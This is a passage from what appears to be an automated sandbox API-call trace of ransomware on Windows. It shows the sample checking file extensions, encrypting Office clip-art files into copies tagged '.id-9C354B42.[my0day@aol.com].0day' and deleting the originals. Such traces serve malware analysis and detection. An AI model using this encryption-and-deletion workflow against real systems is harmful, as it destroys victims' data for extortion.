(lpString1=".dbf", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.096] lstrlenW (lpString=".1cd") returned 4 [0271.096] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.096] lstrlenW (lpString=".jpg") returned 4 [0271.096] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.096] lstrlenW (lpString=".doc") returned 4 [0271.096] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString=".docx") returned 5 [0271.096] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.096] lstrlenW (lpString=".pdf") returned 4 [0271.096] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString=".xls") returned 4 [0271.096] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.096] lstrlenW (lpString=".xlsx") returned 5 [0271.096] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.096] lstrlenW (lpString=".ppt") returned 4 [0271.096] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.096] lstrlenW (lpString=".zip") returned 4 [0271.096] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.096] lstrlenW (lpString=".rar") returned 4 [0271.096] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.096] lstrlenW (lpString=".bz2") returned 4 [0271.097] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString=".7z") returned 3 [0271.097] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.097] lstrlenW (lpString=".dbf") returned 4 [0271.097] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.097] lstrlenW (lpString=".1cd") returned 4 [0271.097] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 63 [0271.097] lstrlenW (lpString=".jpg") returned 4 [0271.097] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.097] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.097] lstrlenW (lpString="BS00224_.WMF") returned 12 [0271.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.097] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=1588) returned 1 [0271.097] CloseHandle (hObject=0x388) returned 1 [0271.097] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) returned 0x20 [0271.098] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.098] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.098] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.098] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.098] GetLastError () returned 0x0 [0271.098] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x634, lpOverlapped=0x0) returned 1 [0271.100] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x640, lpOverlapped=0x0) returned 1 [0271.101] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.102] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.102] SetEndOfFile (hFile=0x38c) returned 1 [0271.102] CloseHandle (hObject=0x38c) returned 1 [0271.102] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.102] SetEndOfFile (hFile=0x388) returned 1 [0271.104] CloseHandle (hObject=0x388) returned 1 [0271.104] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.104] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00224_.wmf")) returned 1 [0271.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.107] lstrlenW (lpString=".doc") returned 4 [0271.107] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.107] lstrlenW (lpString=".docx") returned 5 [0271.107] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.107] lstrlenW (lpString=".pdf") returned 4 [0271.107] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.107] lstrlenW (lpString=".xls") returned 4 [0271.107] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.107] lstrlenW (lpString=".xlsx") returned 5 [0271.107] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.107] lstrlenW (lpString=".ppt") returned 4 [0271.107] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.107] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.107] lstrlenW (lpString=".zip") returned 4 [0271.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.108] lstrlenW (lpString=".rar") returned 4 [0271.108] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString=".bz2") returned 4 [0271.108] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString=".7z") returned 3 [0271.108] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.108] lstrlenW (lpString=".dbf") returned 4 [0271.108] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.108] lstrlenW (lpString=".1cd") returned 4 [0271.108] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.108] lstrlenW (lpString=".jpg") returned 4 [0271.108] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.108] lstrlenW (lpString=".doc") returned 4 [0271.108] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString=".docx") returned 5 [0271.108] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.108] lstrlenW (lpString=".pdf") returned 4 [0271.108] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString=".xls") returned 4 [0271.108] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.108] lstrlenW (lpString=".xlsx") returned 5 [0271.108] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.108] lstrlenW (lpString=".ppt") returned 4 [0271.108] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.108] lstrlenW (lpString=".zip") returned 4 [0271.108] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.108] lstrlenW (lpString=".rar") returned 4 [0271.109] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.109] lstrlenW (lpString=".bz2") returned 4 [0271.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.109] lstrlenW (lpString=".7z") returned 3 [0271.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.109] lstrlenW (lpString=".dbf") returned 4 [0271.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.109] lstrlenW (lpString=".1cd") returned 4 [0271.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned 63 [0271.109] lstrlenW (lpString=".jpg") returned 4 [0271.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.109] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.109] lstrlenW (lpString="BS00438_.WMF") returned 12 [0271.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.110] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=1212) returned 1 [0271.110] CloseHandle (hObject=0x388) returned 1 [0271.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 0x20 [0271.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.110] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.110] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.110] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.111] GetLastError () returned 0x0 [0271.111] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x4bc, lpOverlapped=0x0) returned 1 [0271.116] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x4c0, lpOverlapped=0x0) returned 1 [0271.117] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.117] WriteFile (in: hFile=0x38c, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.117] SetEndOfFile (hFile=0x38c) returned 1 [0271.117] CloseHandle (hObject=0x38c) returned 1 [0271.117] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.117] SetEndOfFile (hFile=0x388) returned 1 [0271.285] CloseHandle (hObject=0x388) returned 1 [0271.285] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.314] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00438_.wmf")) returned 1 [0271.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.426] lstrlenW (lpString=".doc") returned 4 [0271.426] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.426] lstrlenW (lpString=".docx") returned 5 [0271.426] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.426] lstrlenW (lpString=".pdf") returned 4 [0271.426] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.426] lstrlenW (lpString=".xls") returned 4 [0271.426] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.426] lstrlenW (lpString=".xlsx") returned 5 [0271.426] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.427] lstrlenW (lpString=".ppt") returned 4 [0271.427] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.427] lstrlenW (lpString=".zip") returned 4 [0271.427] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.427] lstrlenW (lpString=".rar") returned 4 [0271.427] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString=".bz2") returned 4 [0271.427] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString=".7z") returned 3 [0271.427] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.427] lstrlenW (lpString=".dbf") returned 4 [0271.427] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.427] lstrlenW (lpString=".1cd") returned 4 [0271.427] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.427] lstrlenW (lpString=".jpg") returned 4 [0271.427] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.427] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.427] lstrlenW (lpString=".doc") returned 4 [0271.427] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.427] lstrlenW (lpString=".docx") returned 5 [0271.427] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.427] lstrlenW (lpString=".pdf") returned 4 [0271.427] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.428] lstrlenW (lpString=".xls") returned 4 [0271.428] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.428] lstrlenW (lpString=".xlsx") returned 5 [0271.428] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.428] lstrlenW (lpString=".ppt") returned 4 [0271.428] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.428] lstrlenW (lpString=".zip") returned 4 [0271.428] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.428] lstrlenW (lpString=".rar") returned 4 [0271.428] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.428] lstrlenW (lpString=".bz2") returned 4 [0271.428] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.428] lstrlenW (lpString=".7z") returned 3 [0271.428] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.428] lstrlenW (lpString=".dbf") returned 4 [0271.428] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.428] lstrlenW (lpString=".1cd") returned 4 [0271.428] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.428] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00438_.WMF") returned 63 [0271.428] lstrlenW (lpString=".jpg") returned 4 [0271.428] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.428] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0271.428] lstrlenW (lpString="BS00453_.WMF") returned 12 [0271.428] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0271.447] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2436) returned 1 [0271.447] CloseHandle (hObject=0x38c) returned 1 [0271.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 0x20 [0271.447] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0271.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.456] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.456] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.456] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a0 [0271.457] GetLastError () returned 0x0 [0271.457] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x984, lpOverlapped=0x0) returned 1 [0271.459] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x990, lpOverlapped=0x0) returned 1 [0271.460] ReadFile (in: hFile=0x388, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0271.460] WriteFile (in: hFile=0x3a0, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0271.460] SetEndOfFile (hFile=0x3a0) returned 1 [0271.460] CloseHandle (hObject=0x3a0) returned 1 [0271.460] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0271.460] SetEndOfFile (hFile=0x388) returned 1 [0271.462] CloseHandle (hObject=0x388) returned 1 [0271.463] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0271.463] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00453_.wmf")) returned 1 [0271.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.463] lstrlenW (lpString=".doc") returned 4 [0271.463] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0271.463] lstrlenW (lpString=".docx") returned 5 [0271.463] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0271.463] lstrlenW (lpString=".pdf") returned 4 [0271.463] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0271.463] lstrlenW (lpString=".xls") returned 4 [0271.463] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0271.463] lstrlenW (lpString=".xlsx") returned 5 [0271.463] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0271.463] lstrlenW (lpString=".ppt") returned 4 [0271.463] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0271.463] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.463] lstrlenW (lpString=".zip") returned 4 [0271.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0271.463] lstrlenW (lpString=".rar") returned 4 [0271.464] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString=".bz2") returned 4 [0271.464] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString=".7z") returned 3 [0271.464] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0271.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.464] lstrlenW (lpString=".dbf") returned 4 [0271.464] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.464] lstrlenW (lpString=".1cd") returned 4 [0271.464] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.464] lstrlenW (lpString=".jpg") returned 4 [0271.464] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0271.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00453_.WMF") returned 63 [0271.464] lstrlenW (lpString=".doc") returned 4 [0271.464] 